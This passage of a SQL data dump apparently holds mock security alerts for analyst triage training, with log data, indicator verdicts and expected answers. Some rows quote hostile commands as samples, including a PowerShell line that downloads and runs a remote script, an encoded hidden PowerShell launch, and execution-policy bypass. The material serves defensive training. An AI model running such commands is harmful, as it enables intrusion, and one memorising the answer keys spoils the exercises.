system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with ransomware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"email reputation service\",\"verdict\":\"malicious\",\"details\":\"Email address associated with ransom demands.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"malicious\",\"details\":\"Hash of the ransomware binary detected.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"READ_ME.txt\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal analysis\",\"verdict\":\"suspicious\",\"details\":\"Common filename for ransom notes.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 'NULL', 1, 0, NULL), (364, 'Suspicious Web Shell Detected on IIS Server', 'high', 'IIS Server Logs', 'A suspicious web shell was detected on a telecommunications provider\'s IIS server. The attacker exploited a web vulnerability to deploy a web shell, gaining initial access.', 'Initial Access', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:23:45Z\",\"server_ip\":\"192.168.1.50\",\"client_ip\":\"203.0.113.45\",\"http_method\":\"POST\",\"requested_url\":\"/uploads/shell.aspx\",\"response_code\":200,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"session_id\":\"123456abcdef\",\"filename_uploaded\":\"shell.aspx\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"anonymous\"}', '2026-01-03 00:54:31', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous web shell attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"shell.aspx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"File commonly used as a web shell for unauthorized access.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a web shell previously identified in attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (365, 'Anomalous PowerShell Activity Observed', 'medium', 'PowerShell Logs', 'Unusual PowerShell commands were executed to download additional payloads. This behavior suggests an attempt to leverage legitimate tools for malicious purposes, commonly known as \'living off the land\'.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":4104,\"process_id\":1234,\"script_block_id\":\"abc123\",\"user\":\"jdoe\",\"host\":\"DESKTOP-7A89C4K\",\"ip_address\":\"10.0.0.17\",\"command\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.1.150/malicious.ps1\')\\\"\",\"external_ip\":\"203.0.113.45\",\"downloaded_file\":\"malicious.ps1\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\"}', '2026-01-03 00:54:31', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.17\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the host executing the PowerShell command.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address known for hosting malicious content.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_repositories\",\"verdict\":\"malicious\",\"details\":\"Script associated with known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL), (366, 'Creation of Hidden Scheduled Task', 'medium', 'Task Scheduler Logs', 'To ensure persistent access, Gallium APT creates a covert scheduled task, allowing them to execute scripts at regular intervals.', 'Persistence', 'T1053.005', 1, 'new', NULL, '{\"EventID\":106,\"Timestamp\":\"2023-10-15T14:22:43Z\",\"TaskName\":\"\\\\Microsoft\\\\Windows\\\\Update\\\\HiddenTask\",\"Action\":\"Create\",\"User\":\"COMPANY\\\\jdoe\",\"HostIP\":\"192.168.1.45\",\"AttackerIP\":\"203.0.113.54\",\"FilePath\":\"C:\\\\Windows\\\\System32\\\\hidden_task.ps1\",\"MD5Hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-03 00:54:31', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.54\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP address linked to Gallium APT\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a malicious script used by Gallium APT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL), (367, 'Unauthorized Access to Network Map', 'medium', 'Network Traffic Analysis', 'The attackers initiated a network scan from an external IP address, attempting to map out the telecom infrastructure. This is part of a lateral movement strategy to identify high-value targets within the network.', 'Lateral Movement', 'T1046', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"source_ip\":\"198.51.100.23\",\"destination_ip\":\"192.168.1.10\",\"protocol\":\"TCP\",\"destination_port\":80,\"action\":\"allowed\",\"username\":\"jdoe\",\"filename\":\"network_scan_tool.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event\":\"Network Scan Detected\"}', '2026-01-03 00:54:31', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous APT activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Local network device\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"network_scan_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Tool\",\"verdict\":\"malicious\",\"details\":\"Executable used for unauthorized network scanning\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Repository\",\"verdict\":\"suspicious\",\"details\":\"Hash found in several malware variants\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Valid user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL), (368, 'Exfiltration of Call Detail Records Detected', 'high', 'Data Loss Prevention (DLP) Logs', 'The Gallium APT group has successfully exfiltrated Call Detail Records (CDR) from the compromised network, targeting high-value individuals. The operation was detected as sensitive files were transferred to an external IP address.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:25:43Z\",\"event_id\":\"DLP-EXFIL-005\",\"source_ip\":\"192.168.15.23\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"transferred_files\":[{\"filename\":\"target_CDR_records.zip\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"size\":\"15MB\"}],\"user\":\"compromised_user\",\"action\":\"File Transfer\",\"status\":\"Success\"}', '2026-01-03 00:54:31', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by a compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Gallium APT activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potentially malicious file transfer.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"target_CDR_records.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Sensitive data file identified in exfiltration attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"malicious\",\"details\":\"User account compromised and used in exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (369, 'Suspicious Macro-Enabled Document Detected', 'high', 'Email Gateway Logs', 'A potentially malicious macro-enabled document was detected in an email attachment. The document is designed to execute a payload upon enabling macros, indicating an attempt to gain initial access.', 'Initial Access', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T11:25:34Z\",\"email_sender\":\"john.doe@maliciousdomain.com\",\"email_recipient\":\"employee1@company.com\",\"subject\":\"Important Update on Your Account\",\"attachment_name\":\"AccountUpdate.docm\",\"attachment_hash\":\"4a6f0f5d2b1e8f7d9e9a6c2f3b5e7d8f\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.15\",\"malware_family\":\"Emotet\",\"action_taken\":\"Quarantined\"}', '2026-01-03 23:52:02', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"john.doe@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain associated with Emotet campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"AccountUpdate.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"suspicious\",\"details\":\"Macro-enabled document potentially executing malicious code.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"4a6f0f5d2b1e8f7d9e9a6c2f3b5e7d8f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Emotet malware.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address linked to known phishing and malware distribution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (370, 'Macro Execution Triggers Malicious Script', 'high', 'Endpoint Detection and Response (EDR)', 'Once the macros are enabled, a hidden script is executed, initiating the deployment of the POWERSTATS backdoor.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:22:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.45\",\"username\":\"jdoe\",\"process_name\":\"winword.exe\",\"file_name\":\"malicious_macro.docm\",\"script_executed\":\"powershell.exe -nop -w hidden -enc d2hvYW1p\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"description\":\"Macro in document executed, launching PowerShell script for POWERSTATS backdoor.\"}', '2026-01-03 23:52:02', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal endpoint targeted by malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_macro.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Document contains macro that executes malicious script.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the POWERSTATS malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (371, 'POWERSTATS Backdoor Installed', 'high', 'Registry Change Logs', 'The POWERSTATS backdoor has been installed on the system. It modifies registry settings to ensure continued operation across reboots, establishing persistence.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-17T14:32:45Z\",\"event_id\":4657,\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"PowerStatsService\",\"value_type\":\"REG_SZ\",\"value_data\":\"C:\\\\Windows\\\\System32\\\\pstats.exe\",\"user\":\"SYSTEM\",\"user_sid\":\"S-1-5-18\",\"process_id\":1234,\"process_name\":\"regedit.exe\",\"source_ip\":\"185.199.108.153\",\"hash\":\"3cda3f53e5f4b3c6b9f02e5a1b5a6d8f\",\"internal_ip\":\"192.168.1.45\"}', '2026-01-03 23:52:02', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server for POWERSTATS\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3cda3f53e5f4b3c6b9f02e5a1b5a6d8f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as POWERSTATS backdoor\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"regedit.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Associated with persistence mechanism\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Internal host communicating with C2\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (372, 'Encrypted Communication with C2 Server Detected', 'high', 'Network Traffic Analysis', 'The infected system at 192.168.10.5 has begun encrypted communication with a known C2 server at 203.0.113.45 using HTTPS over non-standard ports. This behavior is consistent with advanced tactics to maintain hidden communication channels.', 'Command and Control', 'T1071.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:20Z\",\"src_ip\":\"192.168.10.5\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"src_port\":50505,\"dst_port\":8443,\"encrypted\":true,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"url\":\"https://203.0.113.45/command\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"payload.bin\",\"username\":\"infected_user\"}', '2026-01-03 23:52:02', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"Known Command and Control server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"suspicious\",\"details\":\"Associated with malware payload\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"payload.bin\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"suspicious\",\"details\":\"Potentially malicious file\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"infected_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account on affected system\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (373, 'Lateral Movement Attempt Detected', 'high', 'Internal Network Logs', 'An advanced lateral movement attempt was detected on the network. The attackers used a compromised host to attempt to access other machines within the network, utilizing stolen credentials and suspicious file transfers.', 'Lateral Movement', 'T1086 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_type\":\"lateral_movement\",\"source_ip\":\"10.0.1.5\",\"destination_ip\":\"192.168.1.20\",\"attacker_ip\":\"203.0.113.12\",\"compromised_user\":\"jdoe\",\"malicious_file\":\"payload.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"action\":\"PowerShell execution\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File \\\\\\\\192.168.1.20\\\\share\\\\payload.exe\",\"detected_by\":\"Host Intrusion Prevention System (HIPS)\"}', '2026-01-03 23:52:02', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Target internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Compromised user account\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"Suspicious executable file\"}},{\"id\":\"artifact_6\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'NULL', 1, 0, NULL), (374, 'Credential Dumping Activity Spotted', 'high', 'Security Information and Event Management (SIEM)', 'An advanced attack has been identified where the attackers have deployed a credential dumping tool to extract passwords from memory, potentially to escalate privileges within the network. The activity was traced back to a specific host within the internal network, and network traffic analysis confirmed communication with a known malicious IP.', 'Credential Access', 'T1003.001 - OS Credential Dumping: LSASS Memory', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:22:35Z\",\"event_type\":\"credential_dumping\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"185.143.221.45\",\"file_name\":\"lsass_dump.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user\":\"administrator\",\"process_name\":\"lsass.exe\",\"detected_tool\":\"Mimikatz\",\"network_traffic\":{\"bytes_sent\":2048,\"bytes_received\":1024,\"protocol\":\"HTTP\"}}', '2026-01-03 23:52:02', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.143.221.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with credential dumping activities\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"lsass_dump.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"endpoint_detection\",\"verdict\":\"suspicious\",\"details\":\"File name commonly associated with credential dumping attacks\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash linked to Mimikatz malware\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Privileged user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (375, 'File Transfer Activity to External Server', 'critical', 'Data Loss Prevention (DLP) System', 'Sensitive information begins to flow out of the network, sent to an external server under the attackers\' control. Advanced techniques are being utilized to exfiltrate data.', 'Exfiltration', 'T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 ', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"dlp-20231012-001\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file_sha256\":\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"file_name\":\"financial_reports_q3_2023.xlsx\",\"transfer_protocol\":\"HTTPS\",\"transfer_size\":\"15MB\",\"action_taken\":\"Alert Triggered\"}', '2026-01-03 23:52:02', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Lookup\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user workstation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory Service\",\"verdict\":\"clean\",\"details\":\"Username of employee John Doe.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash with multiple detections as potential data exfiltration malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"financial_reports_q3_2023.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal File Classification System\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive financial data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (376, 'Wiper Logic Execution Detected', 'critical', 'Endpoint Detection and Response (EDR)', 'As the operation nears its climax, the wiper logic is activated, threatening to erase critical data under the guise of a ransomware attack. The EDR detected the execution of a known wiper malware file on the endpoint, which matches with advanced threat patterns.', 'Impact', 'T1485: Data Destruction', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:12Z\",\"event_type\":\"process_execution\",\"host_ip\":\"192.168.1.45\",\"host_name\":\"CORP-WIN10-07\",\"process_name\":\"wiper_exe_activated.exe\",\"process_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"initiating_user\":\"jdoe\",\"attacker_ip\":\"185.92.220.45\",\"attack_command\":\"wiper_exe_activated.exe /silent\",\"attacker_domain\":\"malicious-domain.com\",\"detection_method\":\"EDR heuristic analysis\"}', '2026-01-03 23:52:02', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known wiper malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"malicious-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Domain used by attacker for command and control.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"wiper_exe_activated.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Filename of the wiper malware detected on endpoint.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Employee account involved in the 